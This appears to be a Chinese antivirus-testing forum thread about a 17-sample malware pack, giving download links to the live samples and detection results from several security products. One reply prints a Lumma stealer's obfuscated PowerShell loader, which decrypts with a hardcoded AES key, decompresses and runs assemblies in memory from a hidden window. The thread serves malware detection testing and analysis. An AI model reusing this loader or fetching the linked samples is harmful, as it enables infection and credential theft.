龟包 240217 17X

神龟Turmi

感谢@hsks 提供的08和09样本

下载：
https://malware.camp/Turtle/TurtleSUSP-240217.zip
分流：
https://mirrors-s1.malware.camp/Turtle/TurtleSUSP-240217.zip
https://mirrors-s2.malware.camp/Turtle/TurtleSUSP-240217.zip
https://mirrors-s3.malware.camp/Turtle/TurtleSUSP-240217.zip
龟包列表：
https://malware.camp/Turtle/

ClamAV:

7/17

不知起什么名

火绒 10x

夜莺算法

ps目前所有ANKit代GUI的版本都是beta版，
KILL 14
MISS 3

hsks

360 11X


自动机分拣后剩4X


双击lumma

stealc



redline




Total：16/17

DisaPDB

KES RTP 2 left

TS-240217-08-Lumma-fb268b.exe miss
TS-240217-14-XenoRAT-659bd6.exe PDM杀

1. 事件: 对象的备份副本已创建
   
2. 应用程序: svchost
   
3. 用户: DESKTOP-7PJ65GJ\mac
   
4. 用户类型: 发起者
   
5. 组件: 行为检测
   
6. 结果说明: 已创建备份副本
   
7. 类型: 木马
   
8. 名称: PDM:Trojan.Win32.Generic
   
9. 威胁级别: 高
   
10. 对象类型: 进程
    
11. 对象路径: C:\Users\mac\Desktop\TurtleSUSP-240217
    
12. 对象名称: TS-240217-14-XenoRAT-659bd6.exe
    
13. SHA256: F1E9F62CC55B275C853EBE69F0B19A221106D9F3C466A299B39C5ABC75111B50
    
14. MD5: EA148B6C80A3AA88B66BCC0739F15C17

复制代码

GreatMOLA

Dr.Web扫描

Fadouse

ESSP + Kaspersky Plus
解压杀12x
双击杀4x
剩余1x，有外联行为、沙箱运行自退。

dght432

360双击勒索病毒miss

hsks

讲一下lumma那个样本

exe-------downloader bat------------lumma
https://www.virustotal.com/gui/f ... 190948509/detection

DisaPDB

hsks 发表于 2024-2-17 21:51
讲一下lumma那个样本

exe-------downloader bat------------lumma

1. C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\jfpoi4u\putty.cmd';$htek='ElsHXBemsHXBensHXBtsHXBAtsHXB'.Replace('sHXB', ''),'GetGPMtCtGPMurtGPMrtGPMenttGPMProtGPMctGPMesstGPM'.Replace('tGPM', ''),'SpCKJTliCKJTtCKJT'.Replace('CKJT', ''),'FrVugYomVugYBasVugYe64VugYStrVugYinVugYgVugY'.Replace('VugY', ''),'EnYFCltYFClrYFClyPoYFClinYFCltYFCl'.Replace('YFCl', ''),'CredYoRadYoRtedYoRDdYoRedYoRcrdYoRyptdYoRordYoR'.Replace('dYoR', ''),'MiOrTaiiOrTnMiOrTodiOrTuleiOrT'.Replace('iOrT', ''),'ReYIZKadYIZKLiYIZKnesYIZK'.Replace('YIZK', ''),'CoUZugpyUZugTUZugoUZug'.Replace('UZug', ''),'ThquKrhquKanshquKforhquKmFhquKinhquKahquKlhquKBlohquKckhquK'.Replace('hquK', ''),'ChyqAsayqAsngyqAseEyqAsxtyqAsenyqAssyqAsionyqAs'.Replace('yqAs', ''),'DeHTLfcoHTLfmpHTLfresHTLfsHTLf'.Replace('HTLf', ''),'IXdEinXdEivoXdEikeXdEi'.Replace('XdEi', ''),'LovUioadvUio'.Replace('vUio', '');powershell -w hidden;function cIjfW($PJzVo){$BRxzh=[System.Security.Cryptography.Aes]::Create();$BRxzh.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BRxzh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BRxzh.Key=[System.Convert]::($htek[3])('w03tzxANj19a7PrSjz1zUFr0CYrXf7EfljFjP8CLKns=');$BRxzh.IV=[System.Convert]::($htek[3])('eJ8tgpaif+FBtXcs8uy/9w==');$TdBnb=$BRxzh.($htek[5])();$GkFrN=$TdBnb.($htek[9])($PJzVo,0,$PJzVo.Length);$TdBnb.Dispose();$BRxzh.Dispose();$GkFrN;}function TiynM($PJzVo){$bDZNq=New-Object System.IO.MemoryStream(,$PJzVo);$JDhzj=New-Object System.IO.MemoryStream;$HrjFA=New-Object System.IO.Compression.GZipStream($bDZNq,[IO.Compression.CompressionMode]::($htek[11]));$HrjFA.($htek[8])($JDhzj);$HrjFA.Dispose();$bDZNq.Dispose();$JDhzj.Dispose();$JDhzj.ToArray();}$CABTf=[System.IO.File]::($htek[7])([Console]::Title);$ogfxv=TiynM (cIjfW ([Convert]::($htek[3])([System.Linq.Enumerable]::($htek[0])($CABTf, 5).Substring(2))));$mcKOZ=TiynM (cIjfW ([Convert]::($htek[3])([System.Linq.Enumerable]::($htek[0])($CABTf, 6).Substring(2))));[System.Reflection.Assembly]::($htek[13])([byte[]]$mcKOZ).($htek[4]).($htek[12])($null,$null);[System.Reflection.Assembly]::($htek[13])([byte[]]$ogfxv).($htek[4]).($htek[12])($null,$null); "

复制代码